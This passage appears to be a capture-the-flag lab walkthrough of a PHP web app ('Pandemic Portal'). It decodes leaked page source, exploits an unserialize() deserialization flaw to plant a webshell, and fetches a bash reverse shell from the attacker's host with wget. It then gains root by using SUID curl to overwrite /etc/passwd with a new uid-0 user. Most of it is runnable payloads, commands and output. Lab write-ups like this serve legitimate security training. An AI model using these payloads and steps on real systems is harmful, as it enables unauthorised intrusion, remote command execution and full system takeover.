gICAgICAgICA8L2xpPgogICAgICAgICAgICAgICAgICAgICA8bGk+CiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJyYWRpbyIgY2xhc3M9ImJ1bGxldCIgbmFtZT0iYnVsbGV0IiBpZD0iYnVsbGV0MyIgdmFsdWU9IjMiIC8+CiAgICAgICAgICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9ImJ1bGxldDMiPkhpZ2ggUHJpb3JpdHk8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgICA8L2xpPgogICAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm90aW9uIj4KICAgICAgICAgICAgICAgICAgPHVsPgogICAgICAgICAgICAgICAgICA8bGk+U2VsZWN0IExhbmd1YWdlPC9saT4KICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0iY2hlY2tib3giIGNsYXNzPSJsYW5nIiBuYW1lPSJsYW5nIiBpZD0ibGFuZzEiIHZhbHVlPSIxIiAvPgogICAgICAgICAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJsYW5nMSI+RW5nbGlzaDwvbGFiZWw+CiAgICAgICAgICAgICAgICAgICAgIDwvbGk+CiAgICAgICAgICAgICAgICAgICAgIDxsaT4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9ImNoZWNrYm94IiBjbGFzcz0ibGFuZyIgbmFtZT0ibGFuZyIgaWQ9ImxhbmcyIiB2YWx1ZT0iMiIgLz4KICAgICAgICAgICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0ibGFuZzIiPkNoaW5lc2U8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgICA8L2xpPgogICAgICAgICAgICAgICAgICAgICA8bGk+CiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJjaGVja2JveCIgY2xhc3M9ImxhbmciIG5hbWU9ImxhbmciIGlkPSJsYW5nMyIgdmFsdWU9IjMiIC8+CiAgICAgICAgICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9ImxhbmczIj5SdXNzaWFuPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICAgPC9saT4KICAgICAgICAgICAgICAgICAgPC91bD4KICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9Im5vdGlvbiI+CiAgICAgICAgICAgICAgICAgIDxpbnB1dCBjbGFzcz0iYnV0dG9uIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTdWJtaXQiPgogICAgICAgICAgICAgICAgICA8aW5wdXQgY2xhc3M9ImJ1dHRvbiIgdHlwZT0icmVzZXQiIHZhbHVlPSJSZXNldCI+CiAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2ZpZWxkc2V0PgogICAgICAgICA8L2Zvcm0+CiAgICAgICAgIDw/cGhwCiAgICAgICAgICAgIGNsYXNzIE15Q2xhc3MgewogICAgICAgICAgICAKICAgICAgICAgICAgcHVibGljICRmb3JtX2ZpbGUgPSAnbXNnd2l0aHJlcy50eHQnOwogICAgICAgICAgICBwdWJsaWMgJG1zZ28gPSAnJzsKICAgICAgICAgICAgCiAgICAgICAgICAgIHB1YmxpYyBmdW5jdGlvbiBTYXZlbXNnbygpIHsKICAgICAgICAgICAgCiAgICAgICAgICAgICRyZXNlYXJjaGVyX25hbWUgPSAkX0dFVFsnbmFtZSddOyAKICAgICAgICAgICAgJHJlc2VhcmNoZXJfZW1haWwgPSAkX0dFVFsnZW1haWwnXTsKICAgICAgICAgICAgJHJlc3BvID0gJF9HRVRbJ2NvbW1lbnRzJ107CiAgICAgICAgICAgIAogICAgICAgICAgICAJJHRoaXMtPiBtc2dvID0gIm1zZ286ICIgLiAkcmVzZWFyY2hlcl9uYW1lIC4gIiB8fCBFbWFpbCA6ICIgLiAkcmVzZWFyY2hlcl9lbWFpbCAuICIgfHwgQ29tbWVudDogIiAuICRyZXNwbyAuICJcbiI7CiAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgICAgIHB1YmxpYyBmdW5jdGlvbiBfX2Rlc3RydWN0KCkgeyAKICAgICAgICAgICAgZmlsZV9wdXRfY29udGVudHMoX19ESVJfXyAuICcvJyAuICR0aGlzLT5mb3JtX2ZpbGUsJHRoaXMtPm1zZ28sRklMRV9BUFBFTkQpOwogICAgICAgICAgICBlY2hvICdTYXZlZCEgOiknOwogICAgICAgICAgICB9CiAgICAgICAgICAgIH0KICAgICAgICAgICAgJHZhbHVlc19zdWJtaXQgPSAkX0dFVFsndmFsdWVzX3N1Ym1pdCddID8/ICcnOwogICAgICAgICAgICAkbXNnb3ZhbHVlc19zdWJtaXQgPSB1bnNlcmlhbGl6ZSgkdmFsdWVzX3N1Ym1pdCk7CiAgICAgICAgICAgIAogICAgICAgICAgICAkd2ViQXBwID0gbmV3IE15Q2xhc3M7CiAgICAgICAgICAgICR3ZWJBcHAgLT4gU2F2ZW1zZ28oKTsKICAgICAgICAgICAgPz4KICAgICAgICAgPGFkZHJlc3M+CiAgICAgICAgICAgIDE1dGggU3RlZXQgV2FtaW5ndG9uLCBDYW5hZGE8YnI+CiAgICAgICAgICAgIDxhYmJyIHRpdGxlPSJ0ZWxlIj5UZWxlcGhvbmU6PC9hYmJyPiAKICAgICAgICAgICAgPHN0cm9uZz45ODc2NS05ODIxMzwvc3Ryb25nPiAKICAgICAgICAgICAgPGEgaHJlZj0ibWFpbHRvOiI+U2VuZCBlbWFpbCEgOik8L2E+CiAgICAgICAgIDwvYWRkcmVzcz4KICAgICAgICAgPGhyPgogICAgICA8L2Rpdj4KICAgPC9ib2R5Pgo8L2h0bWw+ </div>
</body>
</html>
Success! Let’s decode this from base64. It’s large, so let’s save the base64-encoded text into a file named nginx.b64 and let’s pass that to the base64 command.
┌──(kali㉿kali)-[~]
└─$ base64 -d nginx.b64
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Pandemic Portal</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
...
<?php
class MyClass {
public $form_file = 'msgwithres.txt';
public $msgo = '';
public function Savemsgo() {
$researcher_name = $_GET['name'];
$researcher_email = $_GET['email'];
$respo = $_GET['comments'];
$this-> msgo = "msgo: " . $researcher_name . " || Email : " . $researcher_email . " || Comment: " . $respo . "\n";
}
public function __destruct() {
file_put_contents(__DIR__ . '/' . $this->form_file,$this->msgo,FILE_APPEND);
echo 'Saved! :)';
}
}
$values_submit = $_GET['values_submit'] ?? '';
$msgovalues_submit = unserialize($values_submit);
$webApp = new MyClass;
$webApp -> Savemsgo();
?>
<address>
15th Steet Wamington, Canada
<abbr title="tele">Telephone:</abbr>
<strong>98765-98213</strong>
<a href="mailto:">Send email! :)</a>
</address>
<hr>
</div>
</body>
</html>
In the source for the index of the Nginx webapp, we find PHP code that takes some GET parameters and creates an object containing those values. There is a __destruct() function as well. This function will be called when the object is deconstructed or if the script is stopped. The intention appears to be that when the script stops, the object created will be written to a file on the target system.
Below the destruct function, there is a variable named values_submit that is set by a GET parameter and then passed to unserialize(). We might be able to submit a GET request containing a custom serialized object. We can try to overwrite the other variables such as the file name and the file contents. We should be able to abuse this to write a webshell to the target system.
PHP Deserialization Vulnerability
We can craft a serialized PHP object to inject in the following manner:
O:7:"MyClass":2:{s:9:"form_file";s:8:"test.php";s:4:"msgo";s:29:"<?php+system($_GET['cmd']);?>";}
0:7:"MyClass"- Object name of “MyClass” with a length of 72:{- We provide 2 attributess:9:"form_file"- A string attribute of length 9 containing “form_file”
Using this syntax, we can overwrite the msgo variable with a simple PHP shell script. We can additionally overwrite the form_file variable to choose the name of the file that is saved by the _destruct() function.
We need to URL-encode this payload and then craft a request using curl. Let’s submit our serialized PHP object to the webserver using the values_submit parameter. The $ needs to be escaped by adding a \ before it.
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.120.209:8080/index.php?values_submit=O:7:%22MyClass%22:2:%7Bs:9:%22form_file%22;s:8:%22test.php%22;s:4:%22msgo%22;s:29:%22%3C?php+system(\$_GET%5B'cmd'%5D);?%3E%22;%7D"
With that file in place, we can now send commands to be executed on the target system by requesting test.php and providing a command with the parameter cmd. Let’s leverage this to gain a reverse shell.
To start, we create a text file on our kali host containing a simple bash reverse shell, naming it rev.sh.
┌──(kali㉿kali)-[~]
└─$ cat rev.sh
/bin/bash -i >& /dev/tcp/192.168.118.14/4444 0>&1
Let’s host this file using a python webserver.
┌──(kali㉿kali)-[~]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Next, we need to start a listener to catch the reverse shell.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
Using curl, let’s send a command to our webshell to download rev.php on the target.
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.120.209:8080/test.php?cmd=wget+http://192.168.118.14/rev.sh"
We should see the request to our python webserver.
192.168.120.209 - - [30/Nov/2021 14:30:56] "GET /rev.sh HTTP/1.1" 200 -
With this file in place on the target, let’s send another command to execute it.
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.120.209:8080/test.php?cmd=/bin/bash+rev.sh"
This command will hang, and we will receive a connection to our listener.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.118.14] from (UNKNOWN) [192.168.120.209] 40426
bash: cannot set terminal process group (808): Inappropriate ioctl for device
bash: no job control in this shell
www-data@injectocurly:/usr/share/nginx/html$ whoami
whoami
www-data
www-data@injectocurly:/usr/share/nginx/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@injectocurly:/usr/share/nginx/html$
We now have shell access on the target system as the www-data user!
Escalation
SUID Enumeration
We start by searching for SUID binaries on the target system.
www-data@injectocurly:/usr/share/nginx/html$ find / -perm -u=s -type f 2>/dev/null
<e/nginx/html$ find / -perm -u=s -type f 2>/dev/null
...
/usr/bin/chfn
/usr/bin/umount
/usr/bin/mount
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/chsh
/usr/bin/curl
www-data@injectocurly:/usr/share/nginx/html$
In /usr/bin, we find the binaries that have SUID by default, but we also find curl. We can use curl with SUID to elevate our privilege by modifying /etc/passwd to add a new root user.
SUID Abuse
First, let’s make a copy of /etc/passwd in the /tmp directory. Let’s name it passwd.tmp.
www-data@injectocurly:/usr/share/nginx/html$ curl file:///etc/passwd -o /tmp/passwd.tmp
<nx/html$ curl file:///etc/passwd -o /tmp/passwd.tmp
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1827 100 1827 0 0 1784k 0 --:--:-- --:--:-- --:--:-- 1784k
Next, let’s create a copy of this file so we can modify it.
www-data@injectocurly:/usr/share/nginx/html$ cp /tmp/passwd.tmp /tmp/passwd2.tmp
<are/nginx/html$ cp /tmp/passwd.tmp /tmp/passwd2.tmp
We need to generate a password hash for this new account. Let’s use openssl and an easy password.
www-data@injectocurly:/usr/share/nginx/html$ openssl passwd mypassword
openssl passwd mypassword
Warning: truncating password to 8 characters
ATNZh8FU2W/tg
We then append our new user to the end of the copy of the copy of /etc/passwd.
www-data@injectocurly:/usr/share/nginx/html$ echo 'newroot:ATNZh8FU2W/tg:0:0:root:/root:/bin/bash' >> /tmp/passwd2.tmp
<2W/tg:0:0:root:/root:/bin/bash' >> /tmp/passwd2.tmp
Let’s copy our modified file back over the original using curl.
www-data@injectocurly:/usr/share/nginx/html$ curl file:///tmp/passwd2.tmp -o /etc/passwd
<x/html$ curl file:///tmp/passwd2.tmp -o /etc/passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1866 100 1866 0 0 1822k 0 --:--:-- --:--:-- --:--:-- 1822k
Finally, we switch to this new account.
www-data@injectocurly:/usr/share/nginx/html$ su newroot
su newroot
Password: mypassword
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
We now have root access on the target system!
Close